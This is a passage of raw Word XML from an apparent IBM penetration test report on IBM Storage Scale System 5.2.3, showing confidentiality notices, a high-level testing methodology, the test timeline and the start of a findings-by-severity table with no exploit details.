        <w:t>The information contained in this report is IBM Confidential. It is believed to be up-to-date and accurate at the time of its preparation. Any inaccuracies, changes or improvements will be documented in subsequent revision. Authorised readers are responsible for their interpretation and use of the information in this report. IBM Corporation will not be liable for any unauthorised use of this report.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013F3544" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70EB18AA" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading1"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_Toc200562820"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:t>Copyright</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="061E1CFC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">© Copyright IBM Corporation. All Rights Reserved. This is unpublished material and contains trade secrets and other confidential information and is subject to a confidentiality agreement. The unauthorised possession, use, reproduction, distribution, display, or disclosure of this material or the information contained herein is prohibited. The methodology used to test the computer systems is considered proprietary intellectual </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>information of IBM and may not be disclosed without written permission from IBM. IBM gives permission to copy this report for the purposes of disseminating information within your organisation or any regulatory agency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4AABDD" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B01F97" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading1"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="3" w:name="_Toc200562821"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TESTING METHODOLOGY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="6AB8C9AE" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>PTC penetration testing methodology is based on a structured approach applying industry best practices in testing.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
        <w:t>Reconnaissance</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    •   Web Application Sitemap collection, API endpoints, ports and services running</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Gathering publicly available information</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Analysing and understanding architecture of application/network</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Listing technologies, third party services, open source libraries and frameworks used in the application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Gathering threat modelling and previously scanned automated scanner reports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1E12A5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Mapping the attack surface</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    •   Planning the attacks based on the information gathered in the Reconnaissance phase</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Checking the misconfigurations, weak/default credentials against the used frameworks</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Determining all possible attacks scenarios by combining the mapped surfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72BE1623" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Automation Scanners </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    •   Carefully selecting the best suited automated scanner based on the technologies and components used by the application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Executing automated scan to identify possible vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01642086" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Manual analysis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    •   Analysing the application manually to understand the business logic of the application</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Crafting application specific test cases that requires manual intelligence and are out of reach to automated scanners </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Performing vulnerability analysis and developing proof of concepts for the identified vulnerabilities </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A3D946" w14:textId="77777777" w:rsidR="00C429FC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7940660E" w14:textId="563C62B7" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Exploitation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    •   Exploiting the identified vulnerabilities to mimic the impact of actual attack scenarios</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    •   Map the system command executions, data exfiltration and possible damage an actual exploitation can make to the target system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36981BD4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:t>Reporting and Documentation</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">    •   Document the identified security vulnerabilities</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">    •   Assess the risk and impact and accordingly calculate CVSS score for each findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047052E2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1EBD8510" wp14:editId="67A685EF">
            <wp:extent cx="5943600" cy="3505200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4" name="Drawing 4" descr="ptclargelogo"/>
            <wp:cNvGraphicFramePr/>
            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="Picture 4" descr="ptclargelogo"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3505200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="64286AC9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="800"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>For more details please refer Appendix A.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D95942E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E62AFE1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading1"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc200562822"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>EXECUTIVE SUMMARY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="5B023EA7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc200562823"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="002A6683" w14:textId="03A78201" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Product-Security Technology Centre (PTC) performed Penetration Testing (Pen Test) on the IBM Storage Scale System (SSS) and Storage Scale</w:t>
      </w:r>
      <w:r w:rsidR="00992248">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>This report documents the findings of the Pen Test conducted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AB5AE5" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="6" w:name="_Toc200562824"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Timeline</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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50" w:type="dxa"/>
          <w:left w:w="50" w:type="dxa"/>
          <w:bottom w:w="50" w:type="dxa"/>
          <w:right w:w="50" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="2023"/>
        <w:gridCol w:w="1467"/>
        <w:gridCol w:w="1467"/>
        <w:gridCol w:w="1467"/>
        <w:gridCol w:w="1570"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="45831CF1" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73A8A8"/>
          </w:tcPr>
          <w:p w14:paraId="49CB02F2" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73A8A8"/>
          </w:tcPr>
          <w:p w14:paraId="0C3CDA9B" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73A8A8"/>
          </w:tcPr>
          <w:p w14:paraId="159B13E0" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Product Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73A8A8"/>
          </w:tcPr>
          <w:p w14:paraId="79562840" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Start Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73A8A8"/>
          </w:tcPr>
          <w:p w14:paraId="79532212" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>End Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="73A8A8"/>
          </w:tcPr>
          <w:p w14:paraId="054F1271" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Remarks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="6E33FD79" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51FA239D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0435249E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Initial Pentest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05CA6811" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5.2.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4106FD29" w14:textId="75AC76BD" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>19-May-2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="442AF572" w14:textId="6E4F9E0A" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00F0732F">
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t>-Jun-2025</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1000" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F16F14D" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="009604BC">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5B8FF760" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading2"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc200562825"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Summary of Findings by Severity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="3D1217C9" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="heading3"/>
        <w:spacing w:before="200" w:after="0"/>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc200562826"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Overall Security Vulnerability Snapshot</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="5000" w:type="pct"/>
        <w:tblInd w:w="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20" w:type="dxa"/>
          <w:bottom w:w="50" w:type="dxa"/>
          <w:right w:w="20" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2605"/>
        <w:gridCol w:w="2265"/>
        <w:gridCol w:w="2265"/>
        <w:gridCol w:w="2265"/>
      </w:tblGrid>
      <w:tr w:rsidR="009604BC" w14:paraId="6788F345" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="7A2741CC" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Severity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="4F142FC3" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Network Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="54792108" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Container Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="A4EADE"/>
          </w:tcPr>
          <w:p w14:paraId="45F51DE7" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>CLI Count</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="009604BC" w14:paraId="31B51573" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0BE97B6E" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1730EAE1" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AAF6AE4" w14:textId="77777777" w:rsidR="009604BC" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1250" w:type="dxa"/>
          </w:tcPr>
